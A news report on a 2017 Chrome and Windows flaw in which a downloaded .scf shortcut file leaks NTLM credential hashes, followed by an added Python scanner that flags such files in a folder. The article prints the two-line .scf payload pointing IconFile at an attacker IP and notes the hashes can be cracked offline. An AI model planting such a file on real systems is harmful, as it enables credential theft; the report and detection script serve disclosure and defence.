Date:19/05/17
Chrome has credential theft bug
Google's Chrome team is working to fix a bug that allows credential theft. The vulnerability can be exploited by hackers if the browser is running on Windows. The attack succeeds if hackers manage to trick the victim into clicking a link that downloads a Windows .scf file (the old Shell Command File format, a shortcut to Show Desktop since Windows 98), said Defense Code's cybersecurity experts, who discovered the issue.
In practice, the attack exploits the way Chrome and Windows handle .scf files.
Chrome sanitizes most download links, adding the .download extension onto Windows LNK files, but not onto .scf files.
If the user clicks on the link, the malicious .scf file will remain dormant in the Downloads directory until the victim reopens the folder.
This is exactly where the Windows vulnerability lies, because viewing the folder will trigger Windows to try to retrieve an icon associated with the .scf file.
To retrieve the icon, the victim's device will present credentials to the server - their user ID and hashed password on a corporate network, or the home group's credentials if the computer is personal.
In this way, the credentials become available to hackers.
If the .scf file contains a specific code, then the user ID and hashed password will be presented to the attacker's IP:
[Shell]
IconFile=\\170.170.170.170\icon
The user ID and the hashed password can be presented to other services, although recovery of an NTLMv2 hashed password will require offline brute-force cracking.
Brute-forcing the password is an attack of average difficulty, but an NVIDIA GTX 1080 card can recover an eight-character password in less than a day.
Google has announced that it is aware of the problem and is working on a fix.
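An added example, not part of the original article or of Defense Code's research: a Python check a defender could run over a Downloads folder to flag .scf files whose IconFile entry in the [Shell] section points at a remote (UNC) path, which is the condition described above. The function names and the sample files (using the documentation address 192.0.2.10) are constructed for illustration.

```python
import os
import re
import tempfile

# UNC path (\\host\share or //host/share); group 1 captures the host.
UNC_RE = re.compile(r'^[\\/]{2}([^\\/]+)[\\/]')

def decode_scf(data: bytes) -> str:
    """SCF files are INI-style text; accept UTF-16 with a BOM, UTF-8 or ANSI."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8-sig", errors="replace")

def remote_icon_host(data: bytes):
    """Return the remote host named by IconFile in [Shell], or None."""
    section = None
    for raw in decode_scf(data).splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "shell" and "=" in line:
            key, value = line.split("=", 1)
            if key.strip().lower() == "iconfile":
                m = UNC_RE.match(value.strip().strip('"'))
                if m:
                    return m.group(1)
    return None

def scan_folder(folder: str):
    """Yield (path, host) for every .scf file whose icon is fetched remotely."""
    for root, _dirs, files in os.walk(folder):
        for name in files:
            if name.lower().endswith(".scf"):
                path = os.path.join(root, name)
                with open(path, "rb") as fh:
                    host = remote_icon_host(fh.read(65536))
                if host:
                    yield path, host

if __name__ == "__main__":
    # Constructed samples: 192.0.2.10 is a documentation-only address.
    remote = b"[Shell]\r\nIconFile=\\\\192.0.2.10\\icon\r\n"
    local = b"[Shell]\r\nCommand=2\r\nIconFile=explorer.exe,3\r\n"
    with tempfile.TemporaryDirectory() as d:
        for name, body in (("invoice.scf", remote), ("desktop.scf", local)):
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(body)
        for path, host in scan_folder(d):
            print(f"{os.path.basename(path)}: icon loaded from {host}")
```

A hit means that merely opening the folder in Explorer would make Windows contact the named host, so the file should be removed without browsing to it in a file manager.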